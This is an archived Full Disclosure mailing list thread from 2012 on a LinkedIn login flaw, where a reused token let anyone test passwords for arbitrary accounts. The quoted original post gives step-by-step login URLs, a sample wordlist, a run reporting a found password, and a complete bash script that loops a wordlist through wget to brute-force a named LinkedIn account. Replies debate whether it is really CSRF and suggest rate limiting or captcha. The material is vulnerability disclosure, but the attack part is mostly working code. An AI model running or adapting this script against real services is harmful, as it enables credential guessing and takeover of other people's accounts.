Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: LinkedIn CSRF: Login Brute Force

From: Alexander Georgiev <alexander.georgiev () daloo de>
Date: Fri, 18 May 2012 12:22:45 +0200
I agree with you, that this is nothing more than doing it via the login
form, but it is not so useless at all. It can be used by an attacker if
he has a bunch of email addresses and want to try "the common"
passwords, since the attack can be implemented very easy. I would expect
LinkedIn to should stop an IP after X wrong logins (no mather if via
this method or normal login) or use some kind of captcha.


Am 17.05.2012 19:50, schrieb Julius Kivimäki:

Where's the csrf? All I see here is an useless bruteforce attack.

2012/5/17 Fernando A. Lagos B. <fernando () zerial org
<mailto:fernando () zerial org>>

    LinkedIn uses a Token into the login form which can be used many times
    for different usernames. You can do it using the same IP or differents
    IP, the token will not be verified.



    I. Step by step
    ===============
    1). Login into your LinkedIn account and capture the "sourceAlias" and
    "csrfToken" variable (example:
    sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)

    2). Use the Token to login into another account:
    https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody () somedomain 
com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless
    <https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody () 
somedomain 
com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless>

    session_key is the username and session_password is the password.

    3). The password (session_password) is not correct If the
    requested URL
    returns "The email address or password you provided does not match our
    records", else the password if correct.



    II. PoC
    =======

    1). The Wordlist (filename: w)
    [zerial@belcebu ~]$ cat w
    asdfgh
    zxcvbnm
    1234567
    0987654
    12345698
    456_4567
    123456qwert
    qwsdcv
    12wedfgh
    123456qwerty
    12345qwei
    112233
    [zerial@belcebu ~]$


    2). Executing the script:
    [zerial@belcebu ~]$ sh linkedin.sh panic () zerial org
    <mailto:panic () zerial org> w
    Password found: qwsdcv
    [zerial@belcebu ~]$

    This is the correct password for this test user.




    III. Script
    ===========

    #!/bin/bash
    #
    # usage: ./linkedin.sh username () domain com
    <mailto:username () domain com> wordlist
    #

    TOKEN="ajax%3A6265303044444817496"
    sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"

    if [ ! -f $2 ];
    then
           echo "file $2 does not exists"
           exit
    fi

    _USR=$1
    for _PWD in $(cat $2);
    do
           if [ $(echo -n $_PWD|wc -c) -lt 6 ];
           then
                   echo "Ignoring $_PWD (must be grather than 6
    chars)"; continue
           fi
           wget -o /dev/null -O -
    
"https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless
    
<https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless>"|grep
    'The email address or password you provided does not match our
    records\|captcha' >>/dev/null
           if [ $? -eq 1 ];
           then
                   echo "Password found: $_PWD"; exit;
           fi
    done

    echo "Password NOT found. Try later."
    #EOF





    More info (in spanish):
    http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/




    cheers,
    --
    Fernando A. Lagos Berardi
    Seguridad Informatica
    GNU/Linux User #382319
    Blog: http://blog.zerial.org
    Jabber: zerial () jabberes org <mailto:zerial () jabberes org>

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: